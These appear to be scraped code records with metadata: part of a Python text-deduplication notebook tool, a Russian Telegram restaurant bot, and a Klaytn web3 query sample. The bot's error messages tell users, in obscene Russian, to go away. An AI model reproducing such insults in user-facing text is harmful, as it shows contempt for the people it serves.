index.value].iloc[0,:].squeeze()\n self.show_comparison(text_pair)\n \n with save_out:\n clear_output()\n\n \n # link the update_button with the function\n update_button.on_click(on_update_button_clicked)\n \n # widget to save table\n save_button, save_out = self.click_button_widget(desc='Save table', \n margin='20px 0px 10px 0px',\n width='150px')\n \n # function to define what happens when the display button is clicked\n def on_save_button_clicked(_):\n with save_out:\n # create an output folder if not already exist\n os.makedirs('output', exist_ok=True)\n \n clear_output()\n out_dir = './output/'\n file_name = 'deduplication_table.csv'\n print('Saving in progress...')\n self.save_to_csv(self.deduplication_df,\n out_dir,\n file_name)\n \n clear_output(wait=True)\n \n # download the saved file onto your computer\n print('Table saved. Click below to download:')\n display(DownloadFileLink(out_dir+file_name, file_name))\n \n \n # link the display_button with the function\n save_button.on_click(on_save_button_clicked)\n \n # Widget Layout\n idx_input = widgets.HBox([enter_index, index], layout=widgets.Layout(width='400px', height='30px'))\n action_input = widgets.HBox([enter_action, select_action], layout=widgets.Layout(width='400px', height='30px'))\n disp_btn = widgets.HBox([display_button], layout=widgets.Layout(width='400px', height='70px'))\n update_btn = widgets.HBox([update_button], layout=widgets.Layout(width='400px', height='70px')) \n save_btn = widgets.HBox([save_button], layout=widgets.Layout(width='220px', height='70px'))\n prev_btn = widgets.HBox([prevpair_button], layout=widgets.Layout(width='220px', height='70px'))\n next_btn = widgets.HBox([nextpair_button], layout=widgets.Layout(width='220px', height='70px'))\n \n hbox1 = widgets.HBox([idx_input, action_input], layout=widgets.Layout(width='1000px'))\n hbox2 = widgets.HBox([disp_btn, update_btn], layout=widgets.Layout(width='1000px'))\n hbox3 = widgets.HBox([prev_btn, next_btn, save_btn], layout=widgets.Layout(width='1000px'))\n hbox4 = widgets.HBox([save_out], layout=widgets.Layout(width='1000px', height='60px'))\n \n vbox = widgets.VBox([list_out, hbox1, hbox2, hbox3, hbox4, display_out])\n \n return vbox\n \n \n def get_duplicate_df(self, \n df: pd.DataFrame,\n duplicate: bool = False):\n '''\n Function to get list of duplicate/non-duplicate texts\n \n Args:\n df: the dataframe containing the list of texts\n duplictae: whether to search for duplicate/non-duplicate\n '''\n if duplicate:\n temp_df = df[df.text_id.isin(self.similar_doc_id)].copy()\n else: \n temp_df = df[~df.text_id.isin(self.similar_doc_id)].copy()\n if 'text_with_punc' in self.deduplicated_text_df:\n temp_df.drop(['text'], axis=1, inplace=True)\n temp_df.rename(columns={'text_with_punc': 'text'}, inplace=True)\n \n return temp_df\n \n \n def save_to_zip(self,\n df: pd.DataFrame,\n filename: str):\n '''\n Function to save texts to a zip of .txt file\n \n Args:\n df: the dataframe containing the list of texts to save\n filename: the name of the saved file\n '''\n # create an output folder if not already exist\n os.makedirs('./output/saved_files', exist_ok=True)\n \n for index, row in tqdm(df.iterrows(), \n total=len(df)):\n #with open('./output/saved_files/{}_{}.txt'.format(row.text_id, \n # row.text_name), 'w') as f:\n with open('./output/saved_files/{}.txt'.format(row.text_name), 'w') as f:\n f.write(row.text)\n \n def zipdir(path, ziph):\n # ziph is zipfile handle\n for root, dirs, files in os.walk(path):\n for file in files:\n ziph.write(os.path.join(root, file), \n os.path.relpath(os.path.join(root, file), \n os.path.join(path, '..')))\n\n with zipfile.ZipFile('./output/'+filename, 'w', zipfile.ZIP_DEFLATED) as zipf:\n zipdir('./output/saved_files/', zipf)\n \n # remove files and directory once finished\n os.system('rm -r ./output/saved_files')\n print('Your texts have been saved. Click below to download:')\n \n # download the zip file onto your computer\n file_name = './output/'+filename\n display(DownloadFileLink(file_name, file_name[9:]))\n \n \n def finalise_and_save(self, n: int):\n '''\n Function to finalise deduplication selections and save all kept texts \n \n Args:\n n: the number of rows to display\n '''\n # output the list of non-duplicated texts\n deduplicated_out = widgets.Output()\n \n with deduplicated_out:\n self.duplicated_text_df = self.get_duplicate_df(self.text_df, True)\n self.deduplicated_text_df = self.get_duplicate_df(self.text_df, False)\n display(self.deduplicated_text_df.iloc[:,0:4].head(n))\n \n # widget to save non-duplicated texts\n save_button, save_out = self.click_button_widget(desc='Save non-duplicated texts', \n margin='20px 0px 10px 0px',\n width='200px')\n \n # function to define what happens when the save button is clicked\n def on_save_button_clicked(_):\n with save_out:\n clear_output()\n \n # compress and save deduplicated text files\n self.save_to_zip(self.deduplicated_text_df, 'deduplicated_texts.zip')\n \n # link the save_button with the function\n save_button.on_click(on_save_button_clicked)\n \n # widget to save non-duplicated texts\n save_dup_button, save_dup_out = self.click_button_widget(desc='Save duplicated texts', \n margin='5px 0px 10px 0px',\n width='200px')\n \n # function to define what happens when the save button is clicked\n def on_save_dup_button_clicked(_):\n with save_dup_out:\n clear_output()\n \n # compress and save deduplicated text files\n self.save_to_zip(self.duplicated_text_df, 'duplicated_texts.zip')\n \n # link the save_button with the function\n save_dup_button.on_click(on_save_dup_button_clicked)\n \n # displaying inputs, buttons and their outputs\n vbox = widgets.VBox([deduplicated_out, save_button, save_out, save_dup_button, save_dup_out])\n \n return vbox\n \n \n def show_comparison(self, text_pair: pd.Series):\n '''\n Function to display comparison of pair of similar texts side-by-side in html format\n \n Args:\n text_pair: the pair of texts to display\n '''\n # obtain text and metadata\n title1 = f'Text: {text_pair.text_name1}'\n title2 = f'Text: {text_pair.text_name2}'\n if self.exclude_punc:\n text1 = self.text_df[self.text_df['text_id']==text_pair.text_id1].text_with_punc.to_list()[0]\n text2 = self.text_df[self.text_df['text_id']==text_pair.text_id2].text_with_punc.to_list()[0]\n else:\n text1 = self.text_df[self.text_df['text_id']==text_pair.text_id1].text.to_list()[0]\n text2 = self.text_df[self.text_df['text_id']==text_pair.text_id2].text.to_list()[0]\n \n metadata1 = f'text_id: {text_pair.text_id1}; word_count: {text_pair.word_count1}; Jaccard similarity: {text_pair.similarity}; status: {text_pair.status1}'\n metadata2 = f'text_id: {text_pair.text_id2}; word_count: {text_pair.word_count2}; Jaccard similarity: {text_pair.similarity}; status: {text_pair.status2}'\n \n myhtml = html_diffs(text1, text2, title1, title2, metadata1, metadata2)\n \n display(HTML(myhtml))\n \n \n def count_text_words(self, text: str):\n '''\n Function to tokenize a document and count the number of words in the document\n \n Args:\n text: the text to tokenize and count the number of words\n '''\n return len(list(tokenize(text)))\n \n \n def convertTuple(self, tup: tuple):\n '''\n Function to join a tuple of words into a sentence\n \n Args:\n tup: the tuple containing the list of words\n '''\n return ' '.join(tup)\n \n \n def make_text_hash(self, \n text: str, \n num_perm: int = 256, \n ngram_value: int = 1):\n '''\n Function to create hash for each document using datasketch.MinHash\n (https://ekzhu.com/datasketch/minhash.html)\n \n Args:\n text: the text to create hash\n num_perm: the number of permutation functions for estimating Jaccard similarity\n ngram_value: the n-gram size (the number of words used to detect similarity)\n '''\n # tokenize text, obtain ngrams, convert to a list, \n # join the items in the list and get the tuple of the new list\n myset = set([self.convertTuple(x) for x in list(ngrams(tokenize(text), ngram_value))])\n \n # initiate MinHash and set the number of permutation functions used in MinHash\n hash1 = MinHash(num_perm)\n \n # get minhash object from the set\n for d in myset:\n hash1.update(d.encode('utf8'))\n \n return hash1\n \n \n def get_matches(self, \n lsh, \n hash_doc, \n text_id: str) -> list:\n '''\n Function to find matched documents\n \n Args:\n lsh: the Locality Sensitive Hashing (LSH) index \n hash_doc: the hash for the document\n text_id: the text id of the document\n '''\n # approximate neighbours with Jaccard similarity > the set MinHashLSH threshold (in this case 0.5)\n matches = lsh.query(hash_doc)\n \n # remove if article ID is the same (the same document)\n matches.remove(text_id)\n \n return matches\n \n \n def find_jaccard(self, \n set1: set, \n set2: set, \n m1, \n m2, \n actual_jaccard: bool = False):\n '''\n Function to find matched documents\n \n Args:\n set1: set of words from the first document\n set2: set of words from the second document\n m1: MinHash from the first document\n m2: MinHash from the second document\n actual_jaccard: whether to calculate actual or estimated Jaccard similarity\n '''\n # calculate jaccard similarity\n if len(set1.union(set2)) != 0:\n if actual_jaccard:\n return len(set1.intersection(set2))/len(set1.union(set2))\n else:\n return m1.jaccard(m2)\n else:\n # the sets have nothing in common\n # to avoid divide by 0 error\n return 0\n \n \n def get_jaccards(self, \n df: pd.DataFrame, \n original: str, \n matched_list: list, \n ngram_value: int, \n actual_jaccard: bool = False):\n '''\n Function to find matched documents\n \n Args:\n df: the pandas DataFrame containing the texts\n original: the text id of the first document\n matched_list: a list of text id's of the matched (possible similar) documents\n ngram_value: the n-gram size (the number of words used to detect similarity)\n actual_jaccard: whether to calculate actual or estimated Jaccard similarity\n '''\n # get ngrams and set for the seletced article_id\n body1 = df[(df['text_id'] == original)]['text'].values[0].lower()\n set1 = set(nltk.ngrams(tokenize(body1), n=ngram_value))\n jaccards = []\n m1 = df[(df['text_id'] == original)]['hash'].values[0]\n \n # no matches for this article\n if len(matched_list) == 0:\n return []\n \n else:\n # if matches, calculate the jaccard similarity between the sets\n for id in matched_list:\n body2 = df[(df['text_id'] == id)]['text'].values[0].lower()\n set2 = set(nltk.ngrams(tokenize(body2), n=ngram_value))\n m2 = df[(df['text_id'] == id)]['hash'].values[0]\n jaccard = round(self.find_jaccard(set1, set2, m1, m2, actual_jaccard),4)\n jaccards.append(jaccard)\n \n return jaccards\n \n \n def explode_list(self, \n df: pd.DataFrame, \n col: 'str') -> list:\n '''\n Function to convert a list of list to a flat list\n \n Args:\n df: the pandas DataFrame containing the texts\n col: the column in the pandas DataFrame to be converted into a flat list\n '''\n return list(chain.from_iterable(df[col].to_list()))\n \n \n def plot_hash_similarity_by_source(self, df: pd.DataFrame):\n '''\n Function to plot a histogram of similarity count\n \n Args:\n df: the pandas DataFrame containing the similarity\n '''\n # visualise similarity scores\n title = \"Similarity count accross the entire corpus\"\n \n plot = sns.histplot(data=(df[\n # return single row for article_id and similarity_score,\n # so one row per article for this plot \n ~df[\n ['text_id1',\"similarity\"]]\n .duplicated()]) , x=\"similarity\") #.set_title(title)\n \n plot.set(xlabel='Jaccard similarity score',\n ylabel='No. of similar documents',\n title=title)\n \n return plot\n \n def plot_data_range(self, inst):\n if inst.lower() == 'y':\n return self.deduplication_df.index\n if inst.lower() == 'n':\n return False\n if inst.isnumeric():\n maxidx = min(int(inst), self.deduplication_df.shape[0])\n return self.deduplication_df.index[:maxidx]\n if '-' in inst and len(inst.split('-')) == 2:\n try:\n [minidx, maxidx] = [int(n.strip()) for n in inst.split('-')]\n maxidx = min(maxidx+1, self.deduplication_df.shape[0])\n return self.deduplication_df.index[minidx:maxidx]\n except:\n return False\n\n \n def plot_heatmap_similarity(self,\n similarity_cutoff: float = 0.5,\n width: int = 900,\n height: int = 700,\n font_size: str = '10px',\n text_color: str = 'white',\n inst: str='n'):\n '''\n Function to plot a histogram of similarity count\n \n Args:\n similarity_cutoff: the Jaccard similarity cut-off for determining similar documents\n width: the width of the heatmap\n height: the height of the heatmap\n font_size: the font size of the label texts\n text_color: the font color of the label texts\n size: display the first N pairs\n '''\n\n idx = self.plot_data_range(inst)\n if idx is False:\n return\n print('\\n\\033[1mYou can hover over the similar nodes to display the text name pairs.\\033[0m\\n')\n # visualise similarity scores\n title = 'Jaccard similarity heatmap (score>{})\\n{} pairs of similar documents ranging from {} to {}'.format(similarity_cutoff, len(idx), min(idx), max(idx))\n\n df = self.deduplication_df.loc[idx][['text_id1','text_id2','text_name1','text_name2','similarity']]\n df['sim_str'] = df['similarity'].apply(lambda x: round(x,2)).astype(str)\n \n tooltips = [\n ('text_name1', '@text_name1'),\n ('text_name2', '@text_name2'),\n ('similarity', '@sim_str'),\n ]\n\n x_range = df[['text_id1', 'text_name1']].set_index('text_id1').to_dict()['text_name1']\n y_range = df[['text_id2', 'text_name2']].set_index('text_id2').to_dict()['text_name2']\n\n\n p = figure(title=title,\n x_range=list(x_range.keys()),\n y_range=list(y_range.keys()), \n tooltips=tooltips,\n plot_width=width, plot_height=height,\n )\n \n similarity_colours = linear_cmap(\"similarity\", \"Viridis256\", 1, 0)\n \n p.rect(\n x=\"text_id1\",\n y=\"text_id2\",\n width=1,\n height=1,\n fill_color=similarity_colours,\n visible=True,\n source=df,\n )\n p.xaxis.major_label_orientation = \"vertical\"\n \n source= ColumnDataSource(df)\n labels = LabelSet(\n x=\"text_id1\",\n y=\"text_id2\",\n text='sim_str',\n level='glyph',\n text_align='center',\n text_color=text_color,\n text_font_style='bold',\n text_font_size = {'value': font_size},\n y_offset=0,\n source=source,\n render_mode='canvas'\n )\n p.add_layout(labels)\n \n legend = ColorBar(color_mapper=similarity_colours[\"transform\"])\n p.add_layout(legend, \"right\")\n # reset ticks label\n p.xaxis.axis_label = 'text_name1'\n p.yaxis.axis_label = 'text_name2'\n\n # Replace Axis ticker labels\n # Define custom JavaScript callback for x-axis tick labels\n xaxis_tick_formatter = \"\"\"\n tick = tick.toString();\n return %s[tick];\n \"\"\" % x_range\n\n # Define custom JavaScript callback for y-axis tick labels\n yaxis_tick_formatter = \"\"\"\n tick = tick.toString();\n return %s[tick];\n \"\"\" % y_range\n\n p.xaxis.formatter = FuncTickFormatter(code=xaxis_tick_formatter)\n p.yaxis.formatter = FuncTickFormatter(code=yaxis_tick_formatter)\n\n p.xaxis.axis_label_text_font_size = '16px'\n p.yaxis.axis_label_text_font_size = '16px'\n p.xaxis.major_label_text_font_size = '14px'\n p.yaxis.major_label_text_font_size = '14px'\n \n show(p)\n \n \n def get_duplicate_ids(self, \n df: pd.DataFrame, \n min_similarity: float) -> list:\n '''\n Function to obtain duplicated text id's based on similarity cutoff oand word count\n \n Args:\n df: the pandas DataFrame containing the texts\n min_similarity: Jaccard similarity cutoff for determining similar documents\n '''\n df = df[df.similarity >= min_similarity]\n df = df[df.word_count1 >= df.word_count2]\n \n list1 = list(df['text_id1'].values)\n list2 = list(df['text_id2'].values)\n assert len(list1) == len(list2)\n \n considered, drop = set(), []\n \n for i in range(len(list1)):\n if list1[i] not in considered:\n considered.add(list1[i])\n considered.add(list2[i])\n drop.append(list2[i])\n else:\n if list2[i] not in considered:\n considered.add(list2[i])\n drop.append(list2[i])\n drop = sorted(list(set(drop)))\n \n return drop\n \n \n def select_n_widget(self, \n instruction: str, \n value: int):\n '''\n Create widgets for selecting a number\n \n Args:\n instruction: text instruction for user\n value: initial value of the widget\n '''\n # widget to display instruction\n enter_n = widgets.HTML(\n value=instruction,\n placeholder='',\n description=''\n )\n \n # widgets for selecting n\n n_option = widgets.BoundedIntText(\n value=value,\n min=self.deduplication_df.index.min(),\n max=self.deduplication_df.index.max(),\n step=1,\n description='',\n disabled=False,\n layout = widgets.Layout(width='150px')\n )\n \n return enter_n, n_option\n \n \n def select_options(self, \n instruction: str,\n options: list,\n value: str):\n '''\n Create widgets for selecting options\n \n Args:\n instruction: text instruction for user\n options: list of options for user\n value: initial value of the widget\n '''\n # widget to display instruction\n enter_text = widgets.HTML(\n value=instruction,\n placeholder='',\n description=''\n )\n \n # widget to select entity options\n select_option = widgets.Dropdown(\n options=options,\n value=value,\n description='',\n disabled=False,\n layout = widgets.Layout(width='150px')\n )\n \n return enter_text, select_option\n \n \n def click_button_widget(\n self, \n desc: str, \n margin: str='10px 0px 0px 10px',\n width='320px'\n ):\n '''\n Create a widget to show a button to click\n \n Args:\n desc: description to display on the button widget\n margin: top, right, bottom and left margins for the button widget\n width: the width of the button\n '''\n # widget to show the button to click\n button = widgets.Button(description=desc, \n layout=Layout(margin=margin, width=width),\n style=dict(font_weight='bold'))\n \n # the output after clicking the button\n out = widgets.Output()\n \n return button, out", "repo_name": "Australian-Text-Analytics-Platform/document-similarity", "sub_path": "document_similarity.py", "file_name": "document_similarity.py", "file_ext": "py", "file_size_in_byte": 52673, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "bokeh.io.output_notebook", "line_number": 42, "usage_type": "call"}, {"api_name": "utils.get_projectpaths", "line_number": 59, "usage_type": "call"}, {"api_name": "IPython.display.FileLink", "line_number": 62, "usage_type": "name"}, {"api_name": "os.path.split", "line_number": 71, "usage_type": "call"}, {"api_name": "os.path", "line_number": 71, "usage_type": "attribute"}, {"api_name": "html.escape", "line_number": 77, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 102, "usage_type": "call"}, {"api_name": "ipywidgets.FileUpload", "line_number": 105, "usage_type": "call"}, {"api_name": "ipywidgets.Layout", "line_number": 110, "usage_type": "call"}, {"api_name": "ipywidgets.Output", "line_number": 113, "usage_type": "call"}, {"api_name": "IPython.display.clear_output", "line_number": 120, "usage_type": "call"}, {"api_name": "ipywidgets.VBox", "line_number": 137, "usage_type": "call"}, {"api_name": "ipywidgets.Button", "line_number": 191, "usage_type": "call"}, {"api_name": "ipywidgets.Layout", "line_number": 192, "usage_type": "call"}, {"api_name": "ipywidgets.Output", "line_number": 197, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 229, "usage_type": "call"}, {"api_name": "io.BytesIO", "line_number": 232, "usage_type": "call"}, {"api_name": "zipfile.ZipFile", "line_number": 235, "usage_type": "call"}, {"api_name": "os.remove", "line_number": 261, "usage_type": "call"}, {"api_name": "codecs.decode", "line_number": 266, "usage_type": "call"}, {"api_name": "io.BytesIO", "line_number": 286, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 290, "usage_type": "call"}, {"api_name": "pandas.read_excel", "line_number": 292, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 305, "usage_type": "attribute"}, {"api_name": "hashlib.shake_256", "line_number": 313, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 340, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 345, "usage_type": "call"}, {"api_name": "os.system", "line_number": 355, "usage_type": "call"}, {"api_name": "pandas.DataFrame.from_dict", "line_number": 358, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 358, "usage_type": "attribute"}, {"api_name": "re.sub", "line_number": 394, "usage_type": "call"}, {"api_name": "tqdm.tqdm.pandas", "line_number": 401, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 401, "usage_type": "name"}, {"api_name": "datasketch.MinHashLSH", "line_number": 433, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 435, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 477, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 507, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 519, "usage_type": "call"}, {"api_name": "IPython.display.clear_output", "line_number": 542, "usage_type": "call"}, {"api_name": "IPython.display.display", "line_number": 561, "usage_type": "call"}, {"api_name": "IPython.display.HTML", "line_number": 561, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 584, "usage_type": "attribute"}, {"api_name": "numpy.array_split", "line_number": 595, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 598, "usage_type": "call"}, {"api_name": "ipywidgets.Output", "line_number": 615, "usage_type": "call"}, {"api_name": "IPython.display.clear_output", "line_number": 659, "usage_type": "call"}, {"api_name": "IPython.display.clear_output", "line_number": 669, "usage_type": "call"}, {"api_name": "IPython.display.clear_output", "line_number": 675, "usage_type": "call"}, {"api_name": "IPython.display.clear_output", "line_number": 686, "usage_type": "call"}, {"api_name": "IPython.display.clear_output", "line_number": 691, "usage_type": "call"}, {"api_name": "IPython.display.clear_output", "line_number": 702, "usage_type": "call"}, {"api_name": "IPython.display.clear_output", "line_number": 712, "usage_type": "call"}, {"api_name": "IPython.display.clear_output", "line_number": 724, "usage_type": "call"}, {"api_name": "IPython.display.clear_output", "line_number": 728, "usage_type": "call"}, {"api_name": "IPython.display.clear_output", "line_number": 734, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 749, "usage_type": "call"}, {"api_name": "IPython.display.clear_output", "line_number": 751, "usage_type": "call"}, {"api_name": "IPython.display.clear_output", "line_number": 759, "usage_type": "call"}, {"api_name": "IPython.display.display", "line_number": 763, "usage_type": "call"}, {"api_name": "{'escape': 'html.escape'}", "line_number": 763, "usage_type": "call"}, {"api_name": "ipywidgets.HBox", "line_number": 770, "usage_type": "call"}, {"api_name": "ipywidgets.Layout", "line_number": 770, "usage_type": "call"}, {"api_name": "ipywidgets.HBox", "line_number": 771, "usage_type": "call"}, {"api_name": "ipywidgets.Layout", "line_number": 771, "usage_type": "call"}, {"api_name": "ipywidgets.HBox", "line_number": 772, "usage_type": "call"}, {"api_name": "ipywidgets.Layout", "line_number": 772, "usage_type": "call"}, {"api_name": "ipywidgets.HBox", "line_number": 773, "usage_type": "call"}, {"api_name": "ipywidgets.Layout", "line_number": 773, "usage_type": "call"}, {"api_name": "ipywidgets.HBox", "line_number": 774, "usage_type": "call"}, {"api_name": "ipywidgets.Layout", "line_number": 774, "usage_type": "call"}, {"api_name": "ipywidgets.HBox", "line_number": 775, "usage_type": "call"}, {"api_name": "ipywidgets.Layout", "line_number": 775, "usage_type": "call"}, {"api_name": "ipywidgets.HBox", "line_number": 776, "usage_type": "call"}, {"api_name": "ipywidgets.Layout", "line_number": 776, "usage_type": "call"}, {"api_name": "ipywidgets.HBox", "line_number": 778, "usage_type": "call"}, {"api_name": "ipywidgets.Layout", "line_number": 778, "usage_type": "call"}, {"api_name": "ipywidgets.HBox", "line_number": 779, "usage_type": "call"}, {"api_name": "ipywidgets.Layout", "line_number": 779, "usage_type": "call"}, {"api_name": "ipywidgets.HBox", "line_number": 780, "usage_type": "call"}, {"api_name": "ipywidgets.Layout", "line_number": 780, "usage_type": "call"}, {"api_name": "ipywidgets.HBox", "line_number": 781, "usage_type": "call"}, {"api_name": "ipywidgets.Layout", "line_number": 781, "usage_type": "call"}, {"api_name": "ipywidgets.VBox", "line_number": 783, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 789, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 810, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 820, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 822, "usage_type": "call"}, {"api_name": "os.walk", "line_number": 831, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 833, "usage_type": "call"}, {"api_name": "os.path", "line_number": 833, "usage_type": "attribute"}, {"api_name": "os.path.relpath", "line_number": 834, "usage_type": "call"}, {"api_name": "os.path", "line_number": 834, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 834, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 835, "usage_type": "call"}, {"api_name": "os.path", "line_number": 835, "usage_type": "attribute"}, {"api_name": "zipfile.ZipFile", "line_number": 837, "usage_type": "call"}, {"api_name": "zipfile.ZIP_DEFLATED", "line_number": 837, "usage_type": "attribute"}, {"api_name": "os.system", "line_number": 841, "usage_type": "call"}, {"api_name": "IPython.display.display", "line_number": 846, "usage_type": "call"}, {"api_name": "{'escape': 'html.escape'}", "line_number": 846, "usage_type": "call"}, {"api_name": "ipywidgets.Output", "line_number": 857, "usage_type": "call"}, {"api_name": "IPython.display.display", "line_number": 862, "usage_type": "call"}, {"api_name": "IPython.display.clear_output", "line_number": 872, "usage_type": "call"}, {"api_name": "IPython.display.clear_output", "line_number": 888, "usage_type": "call"}, {"api_name": "ipywidgets.VBox", "line_number": 897, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 902, "usage_type": "attribute"}, {"api_name": "diffviz.html_diffs", "line_number": 922, "usage_type": "call"}, {"api_name": "IPython.display.display", "line_number": 924, "usage_type": "call"}, {"api_name": "IPython.display.HTML", "line_number": 924, "usage_type": "call"}, {"api_name": "gensim.utils.tokenize", "line_number": 934, "usage_type": "call"}, {"api_name": "nltk.ngrams", "line_number": 962, "usage_type": "call"}, {"api_name": "gensim.utils.tokenize", "line_number": 962, "usage_type": "call"}, {"api_name": "datasketch.MinHash", "line_number": 965, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 1024, "usage_type": "attribute"}, {"api_name": "nltk.ngrams", "line_number": 1041, "usage_type": "call"}, {"api_name": "gensim.utils.tokenize", "line_number": 1041, "usage_type": "call"}, {"api_name": "nltk.ngrams", "line_number": 1053, "usage_type": "call"}, {"api_name": "gensim.utils.tokenize", "line_number": 1053, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 1062, "usage_type": "attribute"}, {"api_name": "itertools.chain.from_iterable", "line_number": 1071, "usage_type": "call"}, {"api_name": "itertools.chain", "line_number": 1071, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 1074, "usage_type": "attribute"}, {"api_name": "seaborn.histplot", "line_number": 1084, "usage_type": "call"}, {"api_name": "bokeh.plotting.figure", "line_number": 1153, "usage_type": "call"}, {"api_name": "bokeh.transform.linear_cmap", "line_number": 1160, "usage_type": "call"}, {"api_name": "bokeh.models.ColumnDataSource", "line_number": 1173, "usage_type": "call"}, {"api_name": "bokeh.models.LabelSet", "line_number": 1174, "usage_type": "call"}, {"api_name": "bokeh.models.ColorBar", "line_number": 1189, "usage_type": "call"}, {"api_name": "bokeh.models.FuncTickFormatter", "line_number": 1208, "usage_type": "call"}, {"api_name": "bokeh.models.FuncTickFormatter", "line_number": 1209, "usage_type": "call"}, {"api_name": "bokeh.plotting.show", "line_number": 1216, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 1220, "usage_type": "attribute"}, {"api_name": "ipywidgets.HTML", "line_number": 1263, "usage_type": "call"}, {"api_name": "ipywidgets.BoundedIntText", "line_number": 1270, "usage_type": "call"}, {"api_name": "ipywidgets.Layout", "line_number": 1277, "usage_type": "call"}, {"api_name": "ipywidgets.HTML", "line_number": 1296, "usage_type": "call"}, {"api_name": "ipywidgets.Dropdown", "line_number": 1303, "usage_type": "call"}, {"api_name": "ipywidgets.Layout", "line_number": 1308, "usage_type": "call"}, {"api_name": "ipywidgets.Button", "line_number": 1329, "usage_type": "call"}, {"api_name": "ipywidgets.Layout", "line_number": 1330, "usage_type": "call"}, {"api_name": "ipywidgets.Output", "line_number": 1334, "usage_type": "call"}]}
+{"seq_id": "24458780546", "text": "from typing import Optional, Callable\n\nfrom lib.scenario.base import Scenario\n\n\nclass RegisterUser(Scenario):\n def get_name(self) -> str:\n return \"Зарегистрироваться\"\n\n def start(self, message: \"telebot.types.Message\") -> Optional[Callable]:\n send_id = message.from_user.id\n self.bot.send_message(send_id, \"Введите имя\")\n return self.finish_registration\n\n def finish_registration(self, message: \"telebot.types.Message\") -> Optional[Callable]:\n send_id = message.from_user.id\n\n user_name = message.text\n\n response = self.backend.add_user(telegram_id=send_id, user_name=user_name)\n\n if response.status == 1:\n self.bot.send_message(send_id, f\"Поздравляем, {user_name}! Вы добавлены в сеть Ереван Ресторан\")\n else:\n self.bot.send_message(send_id, \"Какая-то проблема, идите нахуй\")\n\n\nclass ListUsers(Scenario):\n def get_name(self) -> str:\n return \"Список пользователей\"\n\n def start(self, message: \"telebot.types.Message\") -> Optional[Callable]:\n send_id = message.from_user.id\n\n response = self.backend.get_users_list()\n if response.status != 1:\n self.bot.send_message(send_id, \"Какая-то проблема, идите нахуй\")\n return\n\n user_names = [user[\"name\"] for user in response.answer]\n if not len(user_names):\n msg = \"Список пользователей сети Ереван Ресторан пуст\"\n else:\n msg = \"Список пользователей сети Ереван Ресторан:\\n\" + \"\\n\".join(user_names)\n\n self.bot.send_message(send_id, msg)\n\n\nclass ChangeUserName(Scenario):\n def get_name(self) -> str:\n return \"Поменять имя\"\n\n def start(self, message: \"telebot.types.Message\") -> Optional[Callable]:\n send_id = message.from_user.id\n self.bot.send_message(send_id, \"Какое имя вы желаете?\")\n return self.change_name\n\n def change_name(self, message: \"telebot.types.Message\") -> Optional[Callable]:\n send_id = message.from_user.id\n\n new_name = message.text\n response = self.backend.change_user_name(message.from_user.id, new_name)\n\n if response.status == 1:\n self.bot.send_message(send_id, f\"Теперь ваше имя {new_name}\")\n else:\n self.bot.send_message(send_id, \"Какая-то проблема, идите нахуй\")\n", "repo_name": "messiah1349/restaurants_bot", "sub_path": "lib/scenario/user.py", "file_name": "user.py", "file_ext": "py", "file_size_in_byte": 2603, "program_lang": "python", "lang": "ru", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "lib.scenario.base.Scenario", "line_number": 6, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 10, "usage_type": "name"}, {"api_name": "typing.Callable", "line_number": 10, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 15, "usage_type": "name"}, {"api_name": "typing.Callable", "line_number": 15, "usage_type": "name"}, {"api_name": "lib.scenario.base.Scenario", "line_number": 28, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 32, "usage_type": "name"}, {"api_name": "typing.Callable", "line_number": 32, "usage_type": "name"}, {"api_name": "lib.scenario.base.Scenario", "line_number": 49, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 53, "usage_type": "name"}, {"api_name": "typing.Callable", "line_number": 53, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 58, "usage_type": "name"}, {"api_name": "typing.Callable", "line_number": 58, "usage_type": "name"}]}
+{"seq_id": "16459885363", "text": "from web3 import Web3\nfrom web3py_ext import extend\n\nhost = \"https://api.baobab.klaytn.net:8651\"\n\nblockTag = \"0xe8\"\n\nw3 = Web3(Web3.HTTPProvider(host))\neth_response = w3.eth.get_uncle_count_by_block_number(blockTag)\n\nprint(eth_response)\n", "repo_name": "klaytn/web3klaytn", "sub_path": "web3rpc/rpc-specs/code-samples/python/eth/block/getUncleCountByBlockNumber.py", "file_name": "getUncleCountByBlockNumber.py", "file_ext": "py", "file_size_in_byte": 237, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 9, "dataset": "github-code", "pt": "53", "api": [{"api_name": "web3.Web3", "line_number": 8, "usage_type": "call"}, {"api_name": "web3.Web3.HTTPProvider", "line_number": 8, "usage_type": "call"}]}
